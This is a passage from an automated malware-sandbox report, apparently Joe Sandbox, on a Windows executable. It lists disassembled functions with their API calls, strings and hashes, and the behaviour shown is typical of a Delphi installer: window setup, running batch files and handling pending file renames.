windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041F3D4: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDB4,?,0042389F,00423C1C,0041EDB4), ref: 0041F3F2

GetClassInfoA.USER32(00400000,0042368C), ref: 004238AF
RegisterClassA.USER32(00498630), ref: 004238C7
GetSystemMetrics.USER32(00000000), ref: 004238E9
GetSystemMetrics.USER32(00000001), ref: 004238F8
SetWindowLongA.USER32(00410660,000000FC,0042369C), ref: 00423954
SendMessageA.USER32(00410660,00000080,00000001,00000000), ref: 00423975
GetSystemMenu.USER32(00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C,0041EDB4), ref: 00423980
DeleteMenu.USER32(00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C,0041EDB4), ref: 0042398F
DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 0042399C
DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000), ref: 004239B2

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
String ID:
API String ID: 183575631-0
Opcode ID: 916a691b4847f15f2edf33caba05564c21d5fb92d0a77b447c88d0b46adfa804
Instruction ID: a1bb8b483c6051ae977dcd30bc5d6258be0549d98267ef4ab912faaf57b8e79c
Opcode Fuzzy Hash: 916a691b4847f15f2edf33caba05564c21d5fb92d0a77b447c88d0b46adfa804
Instruction Fuzzy Hash: 463184B17402006AEB10BF65DC82F6636A89B15308F10017BFA40EF2D7CABDDD40876D

Function 0042F3D4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 90
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetActiveWindow.USER32 ref: 0042F403
GetFocus.USER32 ref: 0042F40B
RegisterClassA.USER32(004987AC), ref: 0042F42C
CreateWindowExA.USER32(00000000,TWindowDisabler-Window,0042F500,88000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0042F46A
CreateWindowExA.USER32(00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000), ref: 0042F4B0
ShowWindow.USER32(00000000,00000008,00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000,00000000,TWindowDisabler-Window), ref: 0042F4C1
SetFocus.USER32(00000000,00000000,0042F4E3,?,?,?,00000001,00000000,?,00457A52,00000000,0049A628), ref: 0042F4C8

Strings

TWindowDisabler-Window, xrefs: 0042F463, 0042F4A9

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Window$CreateFocus$ActiveClassRegisterShow
String ID: TWindowDisabler-Window
API String ID: 3167913817-1824977358
Opcode ID: c7a7adc83155a0351196465afd34f02b227be391187f6a34a24c1e4424dacc7e
Instruction ID: a85808fe2fc477e6bfefb4b7344e4229cc17534778a3dce562db4a9d559d1a3d
Opcode Fuzzy Hash: c7a7adc83155a0351196465afd34f02b227be391187f6a34a24c1e4424dacc7e
Instruction Fuzzy Hash: 6921A371740710BAE220EF619D03F1B76A4EB14B44FA0813BF904AB2D1D7BC6D5486EE

Function 00452850 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 46
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004528E9,?,?,?,?,00000000,?,004970C5), ref: 00452870
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00452876
GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004528E9,?,?,?,?,00000000,?,004970C5), ref: 0045288A
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00452890

Strings

kernel32.dll, xrefs: 0045286B, 00452885
Wow64DisableWow64FsRedirection, xrefs: 00452866
Wow64RevertWow64FsRedirection, xrefs: 00452880
shell32.dll, xrefs: 004528BC

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
API String ID: 1646373207-2130885113
Opcode ID: 5506a4263b1eff634ed0d2217251898cb45e1d8087d76cbb7271a2c362ce8048
Instruction ID: 1764834aba405073ceae9d3f2b1e241b80e40901185f6bd62a0f27775e5f306d
Opcode Fuzzy Hash: 5506a4263b1eff634ed0d2217251898cb45e1d8087d76cbb7271a2c362ce8048
Instruction Fuzzy Hash: DB0188B0300300EED701BBA29D03B9B3A58EB56725F50443BF80066287D7FC4909DABD

Function 00466898 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 0046693B
ExtractIconA.SHELL32(00400000,00000000,?), ref: 00466961

Part of subcall function 004667D8: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000003), ref: 00466870
Part of subcall function 004667D8: DestroyCursor.USER32(00000000), ref: 00466886

ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004669B8
SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 00466A19
ExtractIconA.SHELL32(00400000,00000000,?), ref: 00466A3F

Strings

c:\directory, xrefs: 00466936
shell32.dll, xrefs: 0046699C

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Icon$Extract$FileInfo$CursorDestroyDraw
String ID: c:\directory$shell32.dll
API String ID: 3376378930-1375355148
Opcode ID: 7864bbd64ffcc0b4d3402a699463e3004b4bbc59a4beffd4c3fd38ea4829321b
Instruction ID: bf7570f26ded7c71d3219d2a7bb3c54f33771564a32a8265e6d4c0c3f8c9e6f1
Opcode Fuzzy Hash: 7864bbd64ffcc0b4d3402a699463e3004b4bbc59a4beffd4c3fd38ea4829321b
Instruction Fuzzy Hash: A1517070600248AFDB10DFA5CD89FDE77E9EB49344F5181B7B908AB351D638AE80CB59

Function 004307B4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 23registryclipboardthreadCOMMON

Download Yara Rule

APIs

RegisterClipboardFormatA.USER32(commdlg_help), ref: 004307BC
RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 004307CB
GetCurrentThreadId.KERNEL32 ref: 004307E5
GlobalAddAtomA.KERNEL32(00000000), ref: 00430806

Strings

WndProcPtr%.8X%.8X, xrefs: 004307F7
commdlg_help, xrefs: 004307B7
commdlg_FindReplace, xrefs: 004307C6

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
API String ID: 4130936913-2943970505
Opcode ID: 286d819e49dc31bff7363ce272760638a3e9e634710abf7e83810de7db046942
Instruction ID: a6afac4a95f2c597deb8a3c09a724b63b9622156ea849986cff8ddd49ab29b56
Opcode Fuzzy Hash: 286d819e49dc31bff7363ce272760638a3e9e634710abf7e83810de7db046942
Instruction Fuzzy Hash: 68F082705583408ED700FB2588027197BE4EB98308F044A7FB498A62E1D77E8510CB9F

Function 0045452C Relevance: 12.2, APIs: 2, Strings: 6, Instructions: 154COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,00454748,00454748,?,00454748,00000000), ref: 004546D6
CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,00454748,00454748,?,00454748), ref: 004546E3

Part of subcall function 00454498: WaitForInputIdle.USER32(?,00000032), ref: 004544C4
Part of subcall function 00454498: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 004544E6
Part of subcall function 00454498: GetExitCodeProcess.KERNEL32(?,?), ref: 004544F5
Part of subcall function 00454498: CloseHandle.KERNEL32(?,00454522,0045451B,?,?,?,00000000,?,?,004546F7,?,?,?,00000044,00000000,00000000), ref: 00454515

Strings

cmd.exe" /C ", xrefs: 00454609
SuG, xrefs: 004546EC
.cmd, xrefs: 004545D7
.bat, xrefs: 004545BC
D, xrefs: 00454674
COMMAND.COM" /C , xrefs: 00454640

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
String ID: .bat$.cmd$COMMAND.COM" /C $D$SuG$cmd.exe" /C "
API String ID: 854858120-3415487018
Opcode ID: 23eb109447d9d06895efbe1d143337b311b109ade6801299bf742d5fbdea7e55
Instruction ID: 0ceb2650e422503ffbc7ed56c7a183e4ec77644398bdd85e9c3e3b3e3b1edd4a
Opcode Fuzzy Hash: 23eb109447d9d06895efbe1d143337b311b109ade6801299bf742d5fbdea7e55
Instruction Fuzzy Hash: 17517F34A0034D6BCB01EF95C881BDDBBB9AF45309F51443BF8047B246D77C9A498759

Function 0042369C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 96windowCOMMON

Download Yara Rule

APIs

LoadIconA.USER32(00400000,MAINICON), ref: 0042372C
GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 00423759
OemToCharA.USER32(?,?), ref: 0042376C
CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 004237AC

Strings

MAINICON, xrefs: 00423721
2, xrefs: 004236FA

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Char$FileIconLoadLowerModuleName
String ID: 2$MAINICON
API String ID: 3935243913-3181700818
Opcode ID: 74ccb24d7ebd2ab93e1510b14834e5329cf565851bcf20c48a8ce73befd404fd
Instruction ID: 37f11e164b18fdaff452b8e89fdec3e7ced50b804c3530562fc3ce32e09f0af8
Opcode Fuzzy Hash: 74ccb24d7ebd2ab93e1510b14834e5329cf565851bcf20c48a8ce73befd404fd
Instruction Fuzzy Hash: BF319370A042549ADF10EF2988857C67BE8AF14308F4441BAE844DB393D7BED988CB95

Function 00418F48 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 55threadCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(00000000), ref: 00418F4D
GlobalAddAtomA.KERNEL32(00000000), ref: 00418F6E
GetCurrentThreadId.KERNEL32 ref: 00418F89
GlobalAddAtomA.KERNEL32(00000000), ref: 00418FAA

Part of subcall function 004230D8: 73A1A570.USER32(00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 0042312E
Part of subcall function 004230D8: EnumFontsA.GDI32(00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 00423141
Part of subcall function 004230D8: 73A24620.GDI32(00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423149
Part of subcall function 004230D8: 73A1A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423154

Part of subcall function 0042369C: LoadIconA.USER32(00400000,MAINICON), ref: 0042372C
Part of subcall function 0042369C: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 00423759
Part of subcall function 0042369C: OemToCharA.USER32(?,?), ref: 0042376C
Part of subcall function 0042369C: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 004237AC

Part of subcall function 0041F128: GetVersion.KERNEL32(?,00419000,00000000,?,?,?,00000001), ref: 0041F136
Part of subcall function 0041F128: SetErrorMode.KERNEL32(00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F152
Part of subcall function 0041F128: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F15E
Part of subcall function 0041F128: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F16C
Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F19C
Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1C5
Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1DA
Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1EF
Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F204
Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F219
Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F22E
Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F243
Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F258
Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F26D

Strings

ControlOfs%.8X%.8X, xrefs: 00418F9B
Delphi%.8X, xrefs: 00418F5F

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: AddressProc$AtomCharCurrentErrorGlobalLoadMode$A24620A480A570EnumFileFontsIconLibraryLowerModuleNameProcessThreadVersion
String ID: ControlOfs%.8X%.8X$Delphi%.8X
API String ID: 3864787166-2767913252
Opcode ID: 4b1039f7c2ed13802eb740582532c433a8c58bd120a281f680ebe107a2bb77c7
Instruction ID: 8205fbe5be641bff71b9ea3a28b72145380c35a95610ff2efd46362842c0834c
Opcode Fuzzy Hash: 4b1039f7c2ed13802eb740582532c433a8c58bd120a281f680ebe107a2bb77c7
Instruction Fuzzy Hash: C1112EB06142409AC740FF76994268A7BE19B6431CF40943FF888EB2D1DB7D99548B5F

Function 0041364C Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

SetWindowLongA.USER32(?,000000FC,?), ref: 00413674
GetWindowLongA.USER32(?,000000F0), ref: 0041367F
GetWindowLongA.USER32(?,000000F4), ref: 00413691
SetWindowLongA.USER32(?,000000F4,?), ref: 004136A4
SetPropA.USER32(?,00000000,00000000), ref: 004136BB
SetPropA.USER32(?,00000000,00000000), ref: 004136D2

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: LongWindow$Prop
String ID:
API String ID: 3887896539-0
Opcode ID: f3fe35187a7c1c9d5e5b286bbae8f081611be039bb05b0364af94d978d137136
Instruction ID: 1bc0ad651c9199286e8a44efdb6fe1d3d914d8875e882f3995fbdb6b4a12be9e
Opcode Fuzzy Hash: f3fe35187a7c1c9d5e5b286bbae8f081611be039bb05b0364af94d978d137136
Instruction Fuzzy Hash: BD11DD75500244BFDB00DF9DDC84E9A3BECEB19364F104676B918DB2A1D738D990CB94

Function 00454BF4 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 142registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60

RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00454D8B,?,00000000,00454DCB), ref: 00454CD1

Strings

SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00454C54
PendingFileRenameOperations, xrefs: 00454C70
WININIT.INI, xrefs: 00454D00
PendingFileRenameOperations2, xrefs: 00454CA0

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CloseOpen
String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
API String ID: 47109696-2199428270
Opcode ID: 62d09565783996254d6c1bfa4da4febbe9c14bc97568f7b469f3c7b5dc2ee008
Instruction ID: ef280fa4ab6b1211fd8f84b8c583b28cf46e24a46f503c910aaa6e023c479b4e
Opcode Fuzzy Hash: 62d09565783996254d6c1bfa4da4febbe9c14bc97568f7b469f3c7b5dc2ee008
Instruction Fuzzy Hash: 7A51BD70E042089FDB11EF61DC51ADEB7B9EF84709F50857BE804BB282D7789E49CA58

Function 00453084 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 83COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00453173,?,?,00000000,0049A628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004530CA
GetLastError.KERNEL32(00000000,00000000,?,00000000,00453173,?,?,00000000,0049A628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004530D3

Strings

.tmp, xrefs: 004530B3
$pI, xrefs: 00453119
oI, xrefs: 00453158, 00453109, 00453113

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID: $pI$.tmp$oI
API String ID: 1375471231-740224434
Opcode ID: 2ce4d594e968045cfd634803865fb4a3602027d56f6b0184727ff020cea49090
Instruction ID: 60a70816440fe1ba2c2b61b043faaaddd8f2043f6f52677016a48fb96d3bd8e1
Opcode Fuzzy Hash: 2ce4d594e968045cfd634803865fb4a3602027d56f6b0184727ff020cea49090
Instruction Fuzzy Hash: 87211575A002089BDB01EFA5C8429DFB7B9EF48305F50457BE901B7382DA7C9F058BA9

Function 00423A94 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

EnumWindows.USER32(00423A2C), ref: 00423AB8
GetWindow.USER32(?,00000003), ref: 00423ACD
GetWindowLongA.USER32(?,000000EC), ref: 00423ADC
SetWindowPos.USER32(00000000,lAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241BB,?,?,00423D83), ref: 00423B12

Strings

lAB, xrefs: 00423B02, 00423B06

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Window$EnumLongWindows
String ID: lAB
API String ID: 4191631535-3476862382
Opcode ID: 7be749a2765c1eff0868bc935b27b92e870f7d4112a7aa4dfcf15c251f2074d3
Instruction ID: d29b09d819a87149adbd2d005cf1232ad5b3f4e75eba8ff45bdb535110d2bb0d
Opcode Fuzzy Hash: 7be749a2765c1eff0868bc935b27b92e870f7d4112a7aa4dfcf15c251f2074d3
Instruction Fuzzy Hash: 3C115E70700610ABDB109F28DC85F5A77E8EB04725F50026AF9A49B2E7C378DD40CB59

Function 0042DD6C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 32registrylibraryloaderCOMMON

Download Yara Rule

APIs

RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 0042DD78
GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DF13,00000000,0042DF2B,?,?,?,?,00000006,?,00000000,00495CC7), ref: 0042DD93
GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DD99

Strings

advapi32.dll, xrefs: 0042DD8E
RegDeleteKeyExA, xrefs: 0042DD89

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: AddressDeleteHandleModuleProc
String ID: RegDeleteKeyExA$advapi32.dll
API String ID: 588496660-1846899949
Opcode ID: 56af588eaeb4f74fed5796c85cc7830cb4b9ca44c12d21c432fbdc1602fa1267
Instruction ID: 8fc99b955978393d7b704f32c9200af3e348b3abe20e6a9a0cbb7a4975712069
Opcode Fuzzy Hash: 56af588eaeb4f74fed5796c85cc7830cb4b9ca44c12d21c432fbdc1602fa1267
Instruction Fuzzy Hash: AFE022F0B91A30AAC72023A9BC4AFA32B28CF60725F985137F081B51D182BC0C40CE9C

Function 0048146C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 213COMMON

Download Yara Rule

APIs

SetActiveWindow.USER32(?,?,00000000,00481781,?,?,00000001,?), ref: 0048157D
SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 004815F2

Strings

, xrefs: 004816AF
Need to restart Windows? %s, xrefs: 0048162F

Memory Dump Source

